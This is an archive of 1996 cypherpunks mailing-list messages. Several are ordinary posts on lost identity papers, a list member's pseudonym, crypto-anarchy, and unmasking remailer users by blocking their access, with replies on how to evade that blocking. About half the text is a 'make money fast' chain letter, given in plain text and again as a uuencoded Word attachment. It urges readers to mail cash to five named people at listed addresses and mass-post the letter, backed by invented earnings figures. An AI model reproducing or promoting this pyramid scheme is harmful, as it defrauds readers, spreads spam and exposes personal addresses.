From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 9 Nov 1996 21:05:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Apartment complex burnt down...
Message-ID: <199611100453.UAA21059@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Suppose Bob lives in an apartment complex. By accident the whole building
burns down. 

Bob manages to escape, but all his papers, including passport, IDs,
credit cards, acount numbers, etc etc gets destroyed.

What can Bob do? Would the government help him?

It seems like he'd be in a really unfavorable position...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Nov 1996 18:03:31 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Black Unicorn exposed?
In-Reply-To: <v02140b03aeaa71ed1c84@[192.0.2.1]>
Message-ID: <Pine.SUN.3.94.961109210020.9873B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Nov 1996, Peter Hendrickson wrote:

> At 11:00 AM 11/9/1996, Robert Hettinga wrote:
> > S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...
> 
> Black Unicorn recently stated that had taken measures to shield
> his identity so that people would be unable to cause harm to
> his professional activities by making unsubstantiated claims
> that could scare off prospective clients.
> 
> It appears now that this protection has evaporated.  It will not
> be very hard in the future to put this information together with
> other statements people may make about Mr. Unicorn.
> 
> We are hardly operating in a hostile environment.  Yet, somebody
> who has apparently gone to some effort to have an anonymous
> identity has been exposed.  The implications of this are worth
> considering.

I'm sorry to disappoint you.
Mr. Hettinga and I decided to put a more reasonable pseudonym in the
blurb for those who might not be familiar with my list reputation.

> 
> Peter Hendrickson
> ph@netcom.com
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 9 Nov 1996 20:10:33 -0800 (PST)
To: steve@edmweb.com (Steve Reid)
Subject: Re: Another possible remailer attack?
In-Reply-To: <Pine.BSF.3.91.961109134348.182B-100000@bitbucket.edmweb.com>
Message-ID: <199611100309.VAA02940@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Steve Reid wrote:
> 
> >Date: Fri, 8 Nov 1996 12:58:42 -0800
> >From: nobody@cypherpunks.ca (John Anonymous MacDonald)
> >Subject: Vulis on the remailers
> > Please, remailers, source block Vulis for a week.
> > Remailer Fan
> 
> Suppose you operate an ISP and you suspect that one of your users (let's
> call him Dimitri) is using anonymous remailers to submit politically
> incorrect messages (under a pseudonym, or all with the same writing style)
> to Usenet, mailing lists, and a well-known phreak/hack publication. Also
> suppose that these public messages are appearing on a regular basis. 
> 
> You want to know if Dimitri is the person regularly posting these
> messages. So, you use your powers as ISP to block his access to all
> remailers. If the public messages suddenly stop then you can be reasonably
> certain that Dimitri was sending them. 
> 
> I expect this would work even against DC nets.
> 
> The only solution I can think of is to have an account with multiple ISPs
> and always send mail from more than one account. This probably wouldn't
> offer much protection against TLAs (NSA, CIA, FBI, MCI, AT&T ;) who may be
> able to block traffic no matter where it comes from. 
> 
> Comments?
> 

"Dimitri" can always telnet to smtp ports of various sites and use them
to forward his mail to remailers. If his ISP blocks him (via a router
filter, for example), then he would notice. A schizophrenic mind can
imagine a situation where USENET Cabal would try to fool him and try to
stand in the middle between him and all smtp servers, emulating their
responses, but that is not terribly feasible.

Also, some people regularly (via crontab) send anonymous email to
themselves, just in case. They would notice when they stop receiving
them.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 9 Nov 1996 12:20:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611092020.VAA01385@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson <ph@netcom.com> wrote:

> What are the benefits of being a cryptoanarchist?  Maybe you get
> to double your income.  Most people won't see this as worth the
> trouble.

If you don't have enough to eat, doubling your income is worth the
trouble.

Crypto-anarchy benefits the poor more than the rich.  The underlings
of society are going to love it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 9 Nov 1996 19:51:32 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Black Unicorn exposed?
In-Reply-To: <Pine.3.89.9611091150.A9466-0100000@netcom9>
Message-ID: <Pine.BSF.3.91.961109213939.29308B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 9 Nov 1996, Lucky Green wrote:

> You are making several unspoken assumptions. One such assumption is that 
> S.L. vonBernhardt is Uni's real name.
> 

Yup. Could be an alias, could even be a client.

- Rabid Wombat
(not my real name)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: markets@mindspring.com (JUD)
Date: Sat, 9 Nov 1996 14:58:08 -0800 (PST)
To: jyu-ohjelmointi-cypherpunks@uunet.uu.net
Subject: TRY THIS FOR FUN - $$payt~1.doc (0/1)
Message-ID: <563297$59h@camel2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


$$$EARN MONEY FAST AND LEGITIMATE!!!!

Not a Chain Letter; No Implied Threats:  That's what I like about it.

OK, OK so here I am trying one of these programs, well I figured, why
not, for the exposure of $5.00 what do I really have to lose.  Heck,
I've lost a great deal more than that just on a night's entertainment,
not to mention what I spend on unnecessary snacks and beverages at
work each day.

So, the lists I have read really do speak about the great benefits of
developing mailing lists.  Why not give it a try as a hobby yourself
and see where it gets you.  The comments are quite clear and
believable:

Ryan Gaskins says:

Not only does it work for me, it works for other folds as well.
Markus Valppu says he made $57,883 in four weeks.  Dave Manning claims
he made $53,664 in the same amount of time.  Dan Shepstone says it was
only $17,000 for him.  Do I know these folks? No, but when I read how
they say they did it, it made sense to me.  Enough sense that I'm
taking a similar chance with $5 of my own money.  Not a big chance, I
admit -- but one with incredible potential, because $5 is all anyone
ever invests in this system.  Period.  That's all Markus, Dave, or Dan
invested, yet their $5 netted them tens of thousands of dollars each,
in a safe, legal completely legitimate way.  Here's how it works in 3
easy steps:

Step 1

Invest your $5 by writing your name and address on five seperate
pieces of paper along with the words: "PLEASE ADD ME TO YOUR MAILING
LIST." (In this way, you're not just sending a dollar to someone;
you're paying for a legitimate service).  Fold a $1 bill, money order,
or bank note inside each paper, and mail them by standard local
mail/post to the following five addresses:

1.	P.R. Corswandt
	Hubertusallee 6-8
	D-14193
	GERMANY

2.	Stig Eriksen
	Stolshaugv. 24
	N-5460 HUSNES
	NORWAY

3.	T. Lavigne 
	19 Whisper Lane
	Milton, VT 05468
	USA

4.	R. Gaskins
	1272 Great Neck Rd #220
	Virginia Beach, VA  23454
	USA

5. 	JUD
	47 West Polk Street
	Suite #100-212
	Chicago, IL   60605
	USA

Step 2

Now using any word processor program, open this document (or re-type
it yourself) remove the top name from the list, and re-number.  This
way #2 becomes #1, #5 becomes #4 and so on.

Put your name and address in as the fifth (#5) on the list.

Step 3

Post the article to at least 250 newsgroups.  There are at least 19000
newsgroups at any given moment in time.  Try posting to as many
newsgroups as you can.  Remember the more groups you post to, the more
people will see your article and send you cash!

Step 4

you are now in business for yourself, and should start seeing returns
within 7 to 14 days!  Remember, the Internet is new and huge.  It is
hard to imagine not benefiting from this friendly exercise in this
incredle rapidly growing market.

Now here is how and why this system works:

Out of every block of 250 posts made, expect 5 responses.
Yes that right, only 5.  You make $5.00 in cash, not checks or money
orders, but real cash with your name at #5.

Each additional person who sent you $1.00 now also makes 250
additional postings with your name at #4, 1000 postings.  On average
then, 50 people will send you $1.00 with your name at #4k,.... $50.00
in your pocket!

Now these 50 new people will make 250 postings each with your name at
#3 or 10,000 postings.  Average return, 500 people = $500.00 they make
250 postings each with your name at #2 = 100,000 postings = 5,000
returns at $1.00 each $5,000.00 in cash!

Finally, 5,000 people make 250 postings each with your name at #1 and
you get a return of $60,000 before your name drops off the list.  And
that's only if everyone down the line makes only 250 postings each!
Your total income for this one cycle is $55,000.

>From time to time when you see your name is no longer on the list, you
take the latest posting you can find and start all over again.

The end result depends on you.  You must follow through and re-post
this article everywhere you can think of.  The more postings you make
the more cash ends up in your mailbox.  It's too easy and too cheap to
passup!!!!

So thats it.  Pretty simple sounding stuff, huh?  But believe me, it
works.  there are millions of people surfing the net every day, all
day, all over the world.  And 100,000 new people get on the net every
day.  You know that, you've seen the stories in the paper.  So, my
friend, read and follow the simple instructions and play fair.  That's
the key.  And that's all there is to it.  print this out right now so
you can refer back to this article easily.  Try to keep an eye on all
the postings you made to make sure everyone is playing fairly.  You
know where your name should be.

If you're really not sure or still think this can't be for real, then
don't do it.  But please print this article and pass it along to
someone you know who really needs the bucks, and see what happens.

REMEBER.HONESTY IS THE BEST POLICY.  YOU DON'T NEED TO CHEAT THE BASIC
IDEA TO MAKE THE BUCKS!  gOOD LUCK TO ALL, AND PLEASE PLAY FAIR AND
YOU WILL MAKE SOME REAL INSTANT FREE CASH!

***By the way, if you try to deceive people by posting the messages
with your name in the list and not sending the bucks to people already
included, you will nnot get much.  Another fellow did this and only
got about $150.00 (and that's after two months).  Then he sent the 5
bills, people added him to thier lists, and in 4-5 weeks he dad over
$10,000!

TRY IT AND YOU'LL BE HAPPY111

WARNING: IT IS ILLEGAL TO USE THIS IDEA WITHOUT PAYING FOR IT DO YOU
WANT TO SPEND 4-7 YEARS IN JAIL FOR MAIL FRAUD!!!????







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: markets@mindspring.com (JUD)
Date: Sat, 9 Nov 1996 14:58:13 -0800 (PST)
To: jyu-ohjelmointi-cypherpunks@uunet.uu.net
Subject: TRY THIS FOR FUN - $$payt~1.doc (1/1)
Message-ID: <56329k$59h@camel2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


begin 644 $$payt~1.doc
MT,\1X*&Q&N$`````````````````````/@`#`/[_"0`&```````````````!
M````%```````````$```%0````$```#^____`````!,```#_____________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________<I6@`8^`)!`````!E`````````````````P``
M[Q@``",E````````````````````````[Q4`````````````````````````
M`````````````````````"```&H`````(```:@```&H@````````:B``````
M``!J(````````&H@````````:B```!0```"T(````````+0@````````M"``
M``````"T(````````+0@````````M"````H```"^(```$````+0@````````
M220``#$```#.(````````,X@````````SB````````#.(````````,X@````
M````SB````````#.(````````,X@````````5"(```(```!6(@```````%8B
M````````5B(``"T```"#(@``U````%<C``#4````*R0``!X```!Z)```6```
M`-(D``!1````220`````````````````````````````:B````````#.(```
M````````#0`.``$``@#.(````````,X@````````````````````````````
M`,X@````````SB````````!))````````!`B````````:B````````!J(```
M`````,X@`````````````````````````````,X@````````$"(````````0
M(@```````!`B````````SB```$(!``!J(````````,X@````````:B``````
M``#.(````````%0B``````````````````#@P;X-B,Z[`7X@```4````DB``
M`"(```!J(````````&H@````````:B````````!J(````````,X@````````
M5"(````````0(@``1````!`B````````````````````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````D)"1%05).($U/3D59($9!4U0@04Y$($Q%
M1TE424U!5$4A(2$A#0U.;W0@82!#:&%I;B!,971T97([($YO($EM<&QI960@
M5&AR96%T<SH@(%1H870G<R!W:&%T($D@;&EK92!A8F]U="!I="X-#4]++"!/
M2R!S;R!H97)E($D@86T@=')Y:6YG(&]N92!O9B!T:&5S92!P<F]G<F%M<RP@
M=V5L;"!)(&9I9W5R960L('=H>2!N;W0L(&9O<B!T:&4@97AP;W-U<F4@;V8@
M)#4N,#`@=VAA="!D;R!)(')E86QL>2!H879E('1O(&QO<V4N("!(96-K+"!)
M)W9E(&QO<W0@82!G<F5A="!D96%L(&UO<F4@=&AA;B!T:&%T(&IU<W0@;VX@
M82!N:6=H="=S(&5N=&5R=&%I;FUE;G0L(&YO="!T;R!M96YT:6]N('=H870@
M22!S<&5N9"!O;B!U;FYE8V5S<V%R>2!S;F%C:W,@86YD(&)E=F5R86=E<R!A
M="!W;W)K(&5A8V@@9&%Y+@T-4V\L('1H92!L:7-T<R!)(&AA=F4@<F5A9"!R
M96%L;'D@9&\@<W!E86L@86)O=70@=&AE(&=R96%T(&)E;F5F:71S(&]F(&1E
M=F5L;W!I;F<@;6%I;&EN9R!L:7-T<RX@(%=H>2!N;W0@9VEV92!I="!A('1R
M>2!A<R!A(&AO8F)Y('EO=7)S96QF(&%N9"!S964@=VAE<F4@:70@9V5T<R!Y
M;W4N("!4:&4@8V]M;65N=',@87)E('%U:71E(&-L96%R(&%N9"!B96QI979A
M8FQE.@T-4GEA;B!'87-K:6YS('-A>7,Z#0U.;W0@;VYL>2!D;V5S(&ET('=O
M<FL@9F]R(&UE+"!I="!W;W)K<R!F;W(@;W1H97(@9F]L9',@87,@=V5L;"X@
M($UA<FMU<R!686QP<'4@<V%Y<R!H92!M861E("0U-RPX.#,@:6X@9F]U<B!W
M965K<RX@($1A=F4@36%N;FEN9R!C;&%I;7,@:&4@;6%D92`D-3,L-C8T(&EN
M('1H92!S86UE(&%M;W5N="!O9B!T:6UE+B`@1&%N(%-H97!S=&]N92!S87ES
M(&ET('=A<R!O;FQY("0Q-RPP,#`@9F]R(&AI;2X@($1O($D@:VYO=R!T:&5S
M92!F;VQK<S\@3F\L(&)U="!W:&5N($D@<F5A9"!H;W<@=&AE>2!S87D@=&AE
M>2!D:60@:70L(&ET(&UA9&4@<V5N<V4@=&\@;64N("!%;F]U9V@@<V5N<V4@
M=&AA="!))VT@=&%K:6YG(&$@<VEM:6QA<B!C:&%N8V4@=VET:"`D-2!O9B!M
M>2!O=VX@;6]N97DN("!.;W0@82!B:6<@8VAA;F-E+"!)(&%D;6ET("TM(&)U
M="!O;F4@=VET:"!I;F-R961I8FQE('!O=&5N=&EA;"P@8F5C875S92`D-2!I
M<R!A;&P@86YY;VYE(&5V97(@:6YV97-T<R!I;B!T:&ES('-Y<W1E;2X@(%!E
M<FEO9"X@(%1H870G<R!A;&P@36%R:W5S+"!$879E+"!O<B!$86X@:6YV97-T
M960L('EE="!T:&5I<B`D-2!N971T960@=&AE;2!T96YS(&]F('1H;W5S86YD
M<R!O9B!D;VQL87)S(&5A8V@L(&EN(&$@<V%F92P@;&5G86P@8V]M<&QE=&5L
M>2!L96=I=&EM871E('=A>2X@($AE<F4G<R!H;W<@:70@=V]R:W,@:6X@,R!E
M87-Y('-T97!S.@T-4W1E<"`Q#0U);G9E<W0@>6]U<B`D-2!B>2!W<FET:6YG
M('EO=7(@;F%M92!A;F0@861D<F5S<R!O;B!F:79E('-E<&5R871E('!I96-E
M<R!O9B!P87!E<B!A;&]N9R!W:71H('1H92!W;W)D<SH@(E!,14%312!!1$0@
M344@5$\@64]54B!-04E,24Y'($Q)4U0N(B`H26X@=&AI<R!W87DL('EO=2=R
M92!N;W0@:G5S="!S96YD:6YG(&$@9&]L;&%R('1O('-O;65O;F4[('EO=2=R
M92!P87EI;F<@9F]R(&$@;&5G:71I;6%T92!S97)V:6-E*2X@($9O;&0@82`D
M,2!B:6QL+"!M;VYE>2!O<F1E<BP@;W(@8F%N:R!N;W1E(&EN<VED92!E86-H
M('!A<&5R+"!A;F0@;6%I;"!T:&5M(&)Y('-T86YD87)D(&QO8V%L(&UA:6PO
M<&]S="!T;R!T:&4@9F]L;&]W:6YG(&9I=F4@861D<F5S<V5S.@T-,2X)4"Y2
M+B!#;W)S=V%N9'0-"4AU8F5R='5S86QL964@-BTX#0E$+3$T,3DS#0E'15)-
M04Y9#0TR+@E3=&EG($5R:6MS96X-"5-T;VQS:&%U9W8N(#(T#0E.+34T-C`@
M2%533D53#0E.3U)705D-#3,N"50N($QA=FEG;F4@#0DQ.2!7:&ES<&5R($QA
M;F4-"4UI;'1O;BP@5E0@,#4T-C@-"55300T--"X)4BX@1V%S:VEN<PT),3(W
M,B!'<F5A="!.96-K(%)D(",R,C`-"59I<F=I;FEA($)E86-H+"!602`@,C,T
M-30-"55300T--2X@"4I51`T)-#<@5V5S="!0;VQK(%-T<F5E=`T)4W5I=&4@
M(S$P,"TR,3(-"4-H:6-A9V\L($E,("`@-C`V,#4-"55300T-4W1E<"`R#0U.
M;W<@=7-I;F<@86YY('=O<F0@<')O8V5S<V]R('!R;V=R86TL(&]P96X@=&AI
M<R!D;V-U;65N="`H;W(@<F4M='EP92!I="!Y;W5R<V5L9BD@<F5M;W9E('1H
M92!T;W`@;F%M92!F<F]M('1H92!L:7-T+"!A;F0@<F4M;G5M8F5R+B`@5&AI
M<R!W87D@(S(@8F5C;VUE<R`C,2P@(S4@8F5C;VUE<R`C-"!A;F0@<V\@;VXN
M#0U0=70@>6]U<B!N86UE(&%N9"!A9&1R97-S(&EN(&%S('1H92!F:69T:"`H
M(S4I(&]N('1H92!L:7-T+@T-4W1E<"`S#0U0;W-T('1H92!A<G1I8VQE('1O
M(&%T(&QE87-T(#(U,"!N97=S9W)O=7!S+B`@5&AE<F4@87)E(&%T(&QE87-T
M(#$Y,#`P(&YE=W-G<F]U<',@870@86YY(&=I=F5N(&UO;65N="!I;B!T:6UE
M+B`@5')Y('!O<W1I;F<@=&\@87,@;6%N>2!N97=S9W)O=7!S(&%S('EO=2!C
M86XN("!296UE;6)E<B!T:&4@;6]R92!G<F]U<',@>6]U('!O<W0@=&\L('1H
M92!M;W)E('!E;W!L92!W:6QL('-E92!Y;W5R(&%R=&EC;&4@86YD('-E;F0@
M>6]U(&-A<V@A#0U3=&5P(#0-#7EO=2!A<F4@;F]W(&EN(&)U<VEN97-S(&9O
M<B!Y;W5R<V5L9BP@86YD('-H;W5L9"!S=&%R="!S965I;F<@<F5T=7)N<R!W
M:71H:6X@-R!T;R`Q-"!D87ES(2`@4F5M96UB97(L('1H92!);G1E<FYE="!I
M<R!N97<@86YD(&AU9V4N("!)="!I<R!H87)D('1O(&EM86=I;F4@;F]T(&)E
M;F5F:71I;F<@9G)O;2!T:&ES(&9R:65N9&QY(&5X97)C:7-E(&EN('1H:7,@
M:6YC<F5D;&4@<F%P:61L>2!G<F]W:6YG(&UA<FME="X-#4YO=R!H97)E(&ES
M(&AO=R!A;F0@=VAY('1H:7,@<WES=&5M('=O<FMS.@T-3W5T(&]F(&5V97)Y
M(&)L;V-K(&]F(#(U,"!P;W-T<R!M861E+"!E>'!E8W0@-2!R97-P;VYS97,N
M#5EE<R!T:&%T(')I9VAT+"!O;FQY(#4N("!9;W4@;6%K92`D-2XP,"!I;B!C
M87-H+"!N;W0@8VAE8VMS(&]R(&UO;F5Y(&]R9&5R<RP@8G5T(')E86P@8V%S
M:"!W:71H('EO=7(@;F%M92!A="`C-2X-#45A8V@@861D:71I;VYA;"!P97)S
M;VX@=VAO('-E;G0@>6]U("0Q+C`P(&YO=R!A;'-O(&UA:V5S(#(U,"!A9&1I
M=&EO;F%L('!O<W1I;F=S('=I=&@@>6]U<B!N86UE(&%T(",T+"`Q,#`P('!O
M<W1I;F=S+B`@3VX@879E<F%G92!T:&5N+"`U,"!P96]P;&4@=VEL;"!S96YD
M('EO=2`D,2XP,"!W:71H('EO=7(@;F%M92!A="`C-&LL+BXN+B`D-3`N,#`@
M:6X@>6]U<B!P;V-K970A#0U.;W<@=&AE<V4@-3`@;F5W('!E;W!L92!W:6QL
M(&UA:V4@,C4P('!O<W1I;F=S(&5A8V@@=VET:"!Y;W5R(&YA;64@870@(S,@
M;W(@,3`L,#`P('!O<W1I;F=S+B`@079E<F%G92!R971U<FXL(#4P,"!P96]P
M;&4@/2`D-3`P+C`P('1H97D@;6%K92`R-3`@<&]S=&EN9W,@96%C:"!W:71H
M('EO=7(@;F%M92!A="`C,B`](#$P,"PP,#`@<&]S=&EN9W,@/2`U+#`P,"!R
M971U<FYS(&%T("0Q+C`P(&5A8V@@)#4L,#`P+C`P(&EN(&-A<V@A#0U&:6YA
M;&QY+"`U+#`P,"!P96]P;&4@;6%K92`R-3`@<&]S=&EN9W,@96%C:"!W:71H
M('EO=7(@;F%M92!A="`C,2!A;F0@>6]U(&=E="!A(')E='5R;B!O9B`D-C`L
M,#`P(&)E9F]R92!Y;W5R(&YA;64@9')O<',@;V9F('1H92!L:7-T+B`@06YD
M('1H870G<R!O;FQY(&EF(&5V97)Y;VYE(&1O=VX@=&AE(&QI;F4@;6%K97,@
M;VYL>2`R-3`@<&]S=&EN9W,@96%C:"$@(%EO=7(@=&]T86P@:6YC;VUE(&9O
M<B!T:&ES(&]N92!C>6-L92!I<R`D-34L,#`P+@T-1G)O;2!T:6UE('1O('1I
M;64@=VAE;B!Y;W4@<V5E('EO=7(@;F%M92!I<R!N;R!L;VYG97(@;VX@=&AE
M(&QI<W0L('EO=2!T86ME('1H92!L871E<W0@<&]S=&EN9R!Y;W4@8V%N(&9I
M;F0@86YD('-T87)T(&%L;"!O=F5R(&%G86EN+@T-5&AE(&5N9"!R97-U;'0@
M9&5P96YD<R!O;B!Y;W4N("!9;W4@;75S="!F;VQL;W<@=&AR;W5G:"!A;F0@
M<F4M<&]S="!T:&ES(&%R=&EC;&4@979E<GEW:&5R92!Y;W4@8V%N('1H:6YK
M(&]F+B`@5&AE(&UO<F4@<&]S=&EN9W,@>6]U(&UA:V4@=&AE(&UO<F4@8V%S
M:"!E;F1S('5P(&EN('EO=7(@;6%I;&)O>"X@($ET)W,@=&]O(&5A<WD@86YD
M('1O;R!C:&5A<"!T;R!P87-S=7`A(2$A#0U3;R!T:&%T<R!I="X@(%!R971T
M>2!S:6UP;&4@<V]U;F1I;F<@<W1U9F8L(&AU:#\@($)U="!B96QI979E(&UE
M+"!I="!W;W)K<RX@('1H97)E(&%R92!M:6QL:6]N<R!O9B!P96]P;&4@<W5R
M9FEN9R!T:&4@;F5T(&5V97)Y(&1A>2P@86QL(&1A>2P@86QL(&]V97(@=&AE
M('=O<FQD+B`@06YD(#$P,"PP,#`@;F5W('!E;W!L92!G970@;VX@=&AE(&YE
M="!E=F5R>2!D87DN("!9;W4@:VYO=R!T:&%T+"!Y;W4G=F4@<V5E;B!T:&4@
M<W1O<FEE<R!I;B!T:&4@<&%P97(N("!3;RP@;7D@9G)I96YD+"!R96%D(&%N
M9"!F;VQL;W<@=&AE('-I;7!L92!I;G-T<G5C=&EO;G,@86YD('!L87D@9F%I
M<BX@(%1H870G<R!T:&4@:V5Y+B`@06YD('1H870G<R!A;&P@=&AE<F4@:7,@
M=&\@:70N("!P<FEN="!T:&ES(&]U="!R:6=H="!N;W<@<V\@>6]U(&-A;B!R
M969E<B!B86-K('1O('1H:7,@87)T:6-L92!E87-I;'DN("!4<GD@=&\@:V5E
M<"!A;B!E>64@;VX@86QL('1H92!P;W-T:6YG<R!Y;W4@;6%D92!T;R!M86ME
M('-U<F4@979E<GEO;F4@:7,@<&QA>6EN9R!F86ER;'DN("!9;W4@:VYO=R!W
M:&5R92!Y;W5R(&YA;64@<VAO=6QD(&)E+@T-268@>6]U)W)E(')E86QL>2!N
M;W0@<W5R92!O<B!S=&EL;"!T:&EN:R!T:&ES(&-A;B=T(&)E(&9O<B!R96%L
M+"!T:&5N(&1O;B=T(&1O(&ET+B`@0G5T('!L96%S92!P<FEN="!T:&ES(&%R
M=&EC;&4@86YD('!A<W,@:70@86QO;F<@=&\@<V]M96]N92!Y;W4@:VYO=R!W
M:&\@<F5A;&QY(&YE961S('1H92!B=6-K<RP@86YD('-E92!W:&%T(&AA<'!E
M;G,N#0U214U%0D52+DA/3D535%D@25,@5$A%($)%4U0@4$],24-9+B`@64]5
M($1/3B=4($Y%140@5$\@0TA%050@5$A%($)!4TE#($E$14$@5$\@34%+12!4
M2$4@0E5#2U,A("!G3T]$($Q50TL@5$\@04Q,+"!!3D0@4$Q%05-%(%!,05D@
M1D%)4B!!3D0@64]5(%=)3$P@34%+12!33TU%(%)%04P@24Y35$%.5"!&4D5%
M($-!4T@A#0TJ*BI">2!T:&4@=V%Y+"!I9B!Y;W4@=')Y('1O(&1E8V5I=F4@
M<&5O<&QE(&)Y('!O<W1I;F<@=&AE(&UE<W-A9V5S('=I=&@@>6]U<B!N86UE
M(&EN('1H92!L:7-T(&%N9"!N;W0@<V5N9&EN9R!T:&4@8G5C:W,@=&\@<&5O
M<&QE(&%L<F5A9'D@:6YC;'5D960L('EO=2!W:6QL(&YN;W0@9V5T(&UU8V@N
M("!!;F]T:&5R(&9E;&QO=R!D:60@=&AI<R!A;F0@;VYL>2!G;W0@86)O=70@
M)#$U,"XP,"`H86YD('1H870G<R!A9G1E<B!T=V\@;6]N=&AS*2X@(%1H96X@
M:&4@<V5N="!T:&4@-2!B:6QL<RP@<&5O<&QE(&%D9&5D(&AI;2!T;R!T:&EE
M<B!L:7-T<RP@86YD(&EN(#0M-2!W965K<R!H92!D860@;W9E<B`D,3`L,#`P
M(0T-5%)9($E4($%.1"!93U4G3$P@0D4@2$%04%DQ,3$-#5=!4DY)3D<Z($E4
M($E3($E,3$5'04P@5$\@55-%(%1(25,@241%02!7251(3U54(%!!64E.1R!&
M3U(@250@1$\@64]5(%=!3E0@5$\@4U!%3D0@-"TW(%E%05)3($E.($I!24P@
M1D]2($U!24P@1E)!540A(2$_/S\_#0T-)"1005D@5$A/4T4@0D]42$524T]-
M12!"24Q,4R0D#14`I-`OI>`]I@@'IP@'J*`%J:`%J@``________________
M____________________________________________________________
M___________________X?_____________\/________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_________________P`#``#O&```!AD```#^````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````````````"=0$"``,``"8#```G`P``;0,`
M`&X#``"2!```DP0``&<%``!H!0``>P4``'P%```]"```/@@``$4(``!&"```
MP`D``,$)``#3"0``Y@D``.\)``#X"0``^0D```D*```9"@``*`H``#`*```Q
M"@``0`H``%$*``!C"@``:`H``&D*``!W"@``D`H``*L*``"P"@``L0H``+D*
M``#."@``W@H``/,*``#X"@``^0H````+```!"P``MPL``/X``<`A\`#^``'`
M(?``_@`!P"'P`/X``<`A\`#^``/`(?``_@`!P"'P`/X``L`A\`#^``'`(?``
M_@`!P"'P`/X``<`A\`#^``?`(?``_@`!P"'P`/X``<`A\`#^``'`(?``_@`$
MP"'P`/X``<`A\`#^``'`(?``_@`!P"'P`/X``<`A\`#^``'`(?``_@`!P"'P
M`/X``<`A\`#^``'`(?``_@`!P"'P`/X``<`A\`#^``'`(?``_@`!P"'P`/X`
M`<`A\`#^``'`(?``_@`!P"'P`/X``<`A\`#^``'`(?``_@`!P"'P`/X``<`A
M\`#^``'`(?``_@`!P"'P`/X``<`A\`#^``'`(?``_@`!P"'P`/X``<`A\`#^
M``'`(?``_@`!P"'P`/X``<`A\`#^``'`(?``_@`"P"'P``````````````$`
M`"VW"P``N`L``/0+``#U"P``_`L``/T+``#[#```_`P```,-```$#0``\PT`
M`/0-```?#@``(`X``%H.``#+#@``S`X``*0/``"E#P``G1```)X0``"@$0``
MH1$``"<2```H$@``!!,```43``!.%0``3Q4``!D6```:%@``T!8``-$6```S
M&```-!@``%(8``!3&```SA@``,\8``#0&```[Q@``/X``<`A\`#^``'`(?``
M_@`!P"'P`/X``<`A\`#^``'`(?``_@`#P"'P`/X``<`A\`#^``'`(?``_@`!
MP"'P`/X``\`A\`#^``'`(?``_@`!P"'P`/X``<`A\`#^``'`(?``_@`"P"'P
M`/X``<`A\`#^``/`(?``_@`!P"'P`/X``\`A\`#^``'`(?``_@`#P"'P`/X`
M`<`A\`#^``+`(?``_@`!P"'P`/X``\`A\`#^``'`(?``_@`&P"'P`/X``<`A
M\`#^``+`(?``_@`!P"'P`/X``\`A\`#^``'`(?``_@`$P"'P`/X``<`A\`#^
M``'`(?``_@`!P"'P`/X``L`A\`#^``'`(?``_@`!P"'P`/X`````````````
M````````````````````````````````````````````````````````````
M`````````````````````0``*`X`#P`(``$`2P`/```````:``!`\?\"`!H`
M!DYO<FUA;``"`````P!A"00`````````````````````````(@!!0/+_H0`B
M`!9$969A=6QT(%!A<F%G<F%P:"!&;VYT````````````````````[Q4```,`
M[Q@`````_____P,`!"#__P$``"#__P(`!B#__P,``````/D'```:$P``[Q4`
M````!P````$`M@````(````````#```&&0``#0```P``MPL``.\8```.``\`
M`````&T"``!T`@``O0(``,,"``#$`@``R@(``#4#```^`P``D`0``)8$``!^
M!0``A@4``,0&``#(!@``R08``-(&``#4!@``X08``/P&````!P```0<```@'
M```*!P``%`<``#<'```^!P``;P<``'8'``#"!P``Q@<``!X)```H"0``1`D`
M`$X)``"$"0``C@D``-(*``#:"@``^0\``/\/```($```#1```#$0```T$```
M>A,``'X3``!O%```<Q0````5```%%0``YQ4``.X5``#Q%0``!P`<``<`'``'
M`!P`!P`<``<`'``'`!P`!P`<``<`'``'`!P`!P`<``<`'``'`!P`!P`<``<`
M'``'`!P`!P`<``<`'``'`!P`!P`<``<`'``'`!P`!P`<``<`'``'`!P`!P`<
M``<`!``'`$0`#DIA;65S($AA;6EL=&]N,D,Z7$UY($1O8W5M96YT<UPD)%!!
M62!42$]312!"3U1(15)33TU%($))3$Q3)"0N9&]C_T!(4"!,87-E<DIE="`U
